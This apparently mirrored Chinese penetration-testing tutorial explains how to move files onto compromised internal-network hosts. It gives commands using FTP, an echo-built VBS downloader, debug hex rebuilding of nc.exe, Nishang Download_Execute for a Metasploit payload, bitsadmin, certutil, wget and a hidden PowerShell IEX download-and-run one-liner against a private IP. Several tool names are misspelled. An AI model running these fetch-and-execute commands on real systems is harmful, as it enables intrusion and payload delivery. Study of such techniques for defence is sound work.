4

SOCKS代理

 8 months ago
source link: https://joker-vip.github.io/2022/05/30/3.6%20%E4%B8%8A%E4%BC%A0%E5%92%8C%E4%B8%8B%E8%BD%BD/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

内网中的上传和下载

利用FTP协议上传

ftp 【服务器的IP地址】
put 【本地的文件】


cd<目录名>:进入指定目录。
lcd<文件夹路径>:定位本地文件夹(上传文件的位置或者下载文件的本地位置)。
type:查看当前的传输方式(默认为ASCII码传输)。
ascil:设置传输方式为ASCII码传输(传输TXT等格式的文件)。
binary:设置传输方式为二进制传输(传输EXE文件,以及图片、视音频文件等)。
close:结束与服务器的FTP会话。
quit:结束与服务器的FTP会话并退出FTP环境。
put<文件名> [newnamel:上传。"newname"为保存时的新名字,若不指定将以原名保存。
send<文件名> [newname]:上传。"newname为保存时的新名字.若不指定将以原名保存。
get<文件名> [newname]:下载。newname为保存时的新名字,若不指定将以原名保存。
mget filename filename..]:.下载多个文件。mget 命令支持空格和“?”两个通配符,例如“mget.mp3”表示下载FTP服务器当前目录下所有扩展名为“mp3”的文件

利用VBS上传

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","ip/文件",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile " 下载到的位置",2 >>download.vbs

依次执行以上命令,会生成download.vbs,命令执行download.vbs,即可下载target.exe文件
Cscript download.vbs

利用Debug上传

DEBUG是一个DOS实用程序,是供程序员使用的程序调试工具,可以用它检查内存中任何地方的字节以及修改任何地方的字节。它可以用于逐指令执行某个程序以验证程序运行的正确性,也可以追踪执行过程、比较一个指令执行前后的值以及比较与移动内存中数据的范围,读写文件与磁盘扇区。

我们利用Debug向目标主机上传文件的原理就是,先将需要上传的exe文件转换为十六进制hex的格式,将hex的内容复制,再通过echo命令将hex内容写入到目标主机上的一个文件中,最后利用debug将hex内容编译成exe文件。

wine exe2bat.exe nc.exe nc.txt

利用Nishang上传

Download Excule是Nishang中的下载执行脚本,常用于下载文本文件并将其转换为EXE文件。使用Nishang上传文件的原理是:利用Nishang将上传的EXE文件转换为十六进制的形式,然后使用echo命令访问目标服务器,最后使用Download Exccute脚本下载文本文件并将其转换为EXE文件。
在这里,需要使用echo命令将Nishang PowersShell脚本的内容上传到目标服务器中,并将执行以下命令,利用Nishang中的exetolext.psl脚本将由Metasploit生成的msf.exe修改为文本文件msf.txt

.\ ExetoText c: msf.exe c: msf.txt

接着,通过echo命令,先将转换的HEX值添加到目标文件中,再将Nishang脚本文件的内容添加到目标文件中。最,输人如下命令,调用Dowlad Excule脚本下载并执行该文本文件。

Download_Execute http://192.168.0.11/msf.txt

使用bitsadmin 进行下载

下载命令:bitsadmin /transfer n http://172.16.12.128/NC.exe E:\nc.exe

使用powershell 进行下载

本地下载:powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.12.128/NC.exe','nc.exe')
远程执行:powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://172.16.12.128/NC.exe'))"

使用 certutil 进行下载

下载文件:certutil -urlcache -split -f http://172.16.12.128/NC.exe
删除缓存:certutil -urlcache -split -f http://172.16.12.128/NC.exe delete
缓存目录:"%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content"

使用 WGET 进行下载

上传免安装的可执行程序wget.exe到目标机器,使用wget下载文件。
wget.exe下载:https://eternallybored.org/misc/wget/
下载命令:wget.exe -O "nc.exe" http://172.16.12.128/NC.exe

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK